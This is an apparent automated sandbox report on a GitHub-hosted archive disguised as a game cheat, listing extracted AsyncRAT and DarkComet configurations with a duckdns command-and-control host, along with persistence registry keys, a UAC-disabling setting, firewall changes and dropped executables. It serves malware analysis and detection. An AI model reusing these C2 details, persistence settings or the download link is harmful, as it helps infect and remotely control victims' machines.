Resubmissions
19/04/2025, 19:51
250419-ykybvstwet 10Analysis
-
max time kernel
475s -
max time network
477s -
platform
windows11-21h2_x64 -
resource
win11-20250410-en -
resource tags
arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system -
submitted
19/04/2025, 19:51
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/doodoofart3443/ZM-ULTI/raw/refs/heads/main/Ultima%20Multihack%20V3.55.rar
Resource
win11-20250410-en
Errors
General
-
Target
https://github.com/doodoofart3443/ZM-ULTI/raw/refs/heads/main/Ultima%20Multihack%20V3.55.rar
Malware Config
Extracted
asyncrat
0.5.8
Default
jvjv2044duck33.duckdns.org:8808
0fC8zJGwBBNm
-
delay
3
-
install
true
-
install_file
csrss.exe
-
install_folder
%AppData%
Extracted
darkcomet
Guest16
jvjv2044duck33.duckdns.org:1604
DC_MUTEX-CK7UE3N
-
InstallPath
MSDCSC\msdcsc.exe
-
gencode
Jp74nsvbhc4i
-
install
true
-
offline_keylogger
true
-
persistence
true
-
reg_key
MicroUpdate
Signatures
-
Asyncrat family
-
Darkcomet family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" VLC1.EXE -
Nanocore family
-
UAC bypass 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x001b00000002b449-958.dat family_asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 375 1168 powershell.exe 376 1168 powershell.exe -
pid Process 5268 powershell.exe 2520 powershell.exe 6612 powershell.exe 5888 powershell.exe 4992 powershell.exe 6412 powershell.exe 3684 powershell.exe 5284 powershell.exe 3320 powershell.exe 4500 powershell.exe 6972 powershell.exe 4192 powershell.exe 6232 powershell.exe 6328 powershell.exe 6724 powershell.exe 6228 powershell.exe 6344 powershell.exe 1168 powershell.exe 2196 powershell.exe 1096 powershell.exe 2264 powershell.exe 5372 powershell.exe 2056 powershell.exe 4712 powershell.exe 5244 powershell.exe -
Disables Task Manager via registry modification
-
Download via BitsAdmin 1 TTPs 4 IoCs
pid Process 5856 bitsadmin.exe 4976 bitsadmin.exe 1084 bitsadmin.exe 4684 bitsadmin.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 860 netsh.exe 6260 netsh.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4140 attrib.exe 5256 attrib.exe -
Executes dropped EXE 52 IoCs
pid Process 1164 Ultima Multihack V3.55.exe 1264 file5.exe 5072 ULTIME MULTIHACK REBORN.EXE 668 VLC1.EXE 2840 WINDOWS DEFENDER.EXE 2000 WINDOWS SECURITY NANO.EXE 5652 msdcsc.exe 5968 msdcsc.exe 1876 msdcsc.exe 2748 csrss.exe 4044 msdcsc.exe 2284 msdcsc.exe 1084 msdcsc.exe 2076 msdcsc.exe 4192 msdcsc.exe 3108 msdcsc.exe 4192 msdcsc.exe 880 msdcsc.exe 5536 msdcsc.exe 2400 msdcsc.exe 1096 msdcsc.exe 776 msdcsc.exe 4404 msdcsc.exe 2056 msdcsc.exe 5944 msdcsc.exe 644 msdcsc.exe 3684 msdcsc.exe 7028 msdcsc.exe 7120 msdcsc.exe 4708 msdcsc.exe 3464 msdcsc.exe 3792 msdcsc.exe 6788 msdcsc.exe 6836 msdcsc.exe 7112 msdcsc.exe 684 msdcsc.exe 5444 msdcsc.exe 6308 msdcsc.exe 5732 msdcsc.exe 5068 msdcsc.exe 5832 msdcsc.exe 1872 msdcsc.exe 4648 msdcsc.exe 3316 msdcsc.exe 6080 msdcsc.exe 6768 msdcsc.exe 1076 msdcsc.exe 6632 msdcsc.exe 3896 msdcsc.exe 7108 msdcsc.exe 6116 msdcsc.exe 4768 msdcsc.exe -
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" msdcsc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" msdcsc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" msdcsc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" VLC1.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" msdcsc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" msdcsc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" msdcsc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\TCP Subsystem = "C:\\Program Files (x86)\\TCP Subsystem\\tcpss.exe" WINDOWS SECURITY NANO.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" msdcsc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" msdcsc.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WINDOWS SECURITY NANO.EXE -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 408 raw.githubusercontent.com 1 raw.githubusercontent.com 4 raw.githubusercontent.com 248 raw.githubusercontent.com 376 raw.githubusercontent.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpE826.tmp.png" csrss.exe -
resource yara_rule behavioral1/files/0x001b00000002b448-948.dat upx behavioral1/memory/668-970-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-980-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5968-986-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/1876-987-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/668-990-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-1004-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/4044-1006-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/4044-1008-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-1029-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/2284-1031-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-1044-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/1084-1045-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/1084-1047-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-1049-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/2076-1051-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/4192-1057-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/3108-1060-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/4192-1063-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-1074-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/880-1076-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-1092-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5536-1093-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/2400-1097-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/1096-1099-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/776-1106-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-1147-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/4404-1149-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-1190-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/2056-1192-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-1215-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5944-1269-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-1475-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/644-1479-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-1622-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/3684-1626-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-1721-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/7028-1746-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/7028-1761-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/7120-1971-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/7120-1973-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-2051-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/4708-2053-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/3464-2076-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-2498-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/3792-2509-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-2611-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/6788-2631-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/6788-2633-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-2636-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/6836-2638-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-2639-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/7112-2640-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/684-2643-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5444-2645-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/6308-2647-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-2748-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5732-2758-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5068-2759-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-2971-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5832-2993-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5652-3035-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/1872-3037-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/4648-3038-0x0000000000400000-0x00000000004B7000-memory.dmp upx -
Drops file in Program Files directory 7 IoCs
description ioc Process File created C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE file5.exe File created C:\Program Files (x86)\VLC1.EXE file5.exe File created C:\Program Files (x86)\WINDOWS DEFENDER.EXE file5.exe File created C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE file5.exe File created C:\Program Files (x86)\TCP Subsystem\tcpss.exe WINDOWS SECURITY NANO.EXE File opened for modification C:\Program Files (x86)\TCP Subsystem\tcpss.exe WINDOWS SECURITY NANO.EXE File opened for modification C:\Program Files (x86)\VLC1.EXE attrib.exe -
Drops file in Windows directory 20 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp\Crashpad\metadata setup.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1605086529\deny_domains.list msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1605086529\deny_full_domains.list msedge.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp\chrome_installer.log setup.exe File opened for modification C:\Windows\SystemTemp\chrome_installer.log setup.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1133994705\LICENSE msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1133994705\sets.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1605086529\manifest.fingerprint msedge.exe File opened for modification C:\Windows\SystemTemp setup.exe File opened for modification C:\Windows\SystemTemp\Crashpad\settings.dat setup.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1605086529\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1133994705\_metadata\verified_contents.json msedge.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp setup.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1133994705\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1133994705\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping4200_1605086529\deny_etld1_domains.list msedge.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File opened for modification F:\Ultima Multihack V3.5\Ultima Multihack V3.55.exe:Zone.Identifier chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINDOWS DEFENDER.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VLC1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Checks processor information in registry 2 TTPs 30 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 64 IoCs
pid Process 5688 timeout.exe 5164 timeout.exe 5332 timeout.exe 4368 timeout.exe 5224 timeout.exe 1632 timeout.exe 1620 timeout.exe 1940 timeout.exe 5312 timeout.exe 2056 timeout.exe 3928 timeout.exe 1468 timeout.exe 5312 timeout.exe 3328 timeout.exe 1816 timeout.exe 4468 timeout.exe 1580 timeout.exe 5944 timeout.exe 1132 timeout.exe 5992 timeout.exe 4260 timeout.exe 4572 timeout.exe 5744 timeout.exe 552 timeout.exe 5456 timeout.exe 5320 timeout.exe 3108 timeout.exe 2072 timeout.exe 1468 timeout.exe 3328 timeout.exe 3108 timeout.exe 2992 timeout.exe 4128 timeout.exe 1880 timeout.exe 1264 timeout.exe 5920 timeout.exe 4424 timeout.exe 2340 timeout.exe 6036 timeout.exe 5224 timeout.exe 5640 timeout.exe 2924 timeout.exe 1588 timeout.exe 5688 timeout.exe 2212 timeout.exe 2196 timeout.exe 1100 timeout.exe 4580 timeout.exe 2812 timeout.exe 5256 timeout.exe 4724 timeout.exe 1264 timeout.exe 4368 timeout.exe 6080 timeout.exe 3048 timeout.exe 4920 timeout.exe 4656 timeout.exe 5856 timeout.exe 1984 timeout.exe 6032 timeout.exe 5284 timeout.exe 2040 timeout.exe 1128 timeout.exe 3144 timeout.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies Control Panel 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Control Panel\Desktop\WallpaperStyle = "2" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Control Panel\Desktop\TileWallpaper = "0" csrss.exe -
Modifies data under HKEY_USERS 20 IoCs
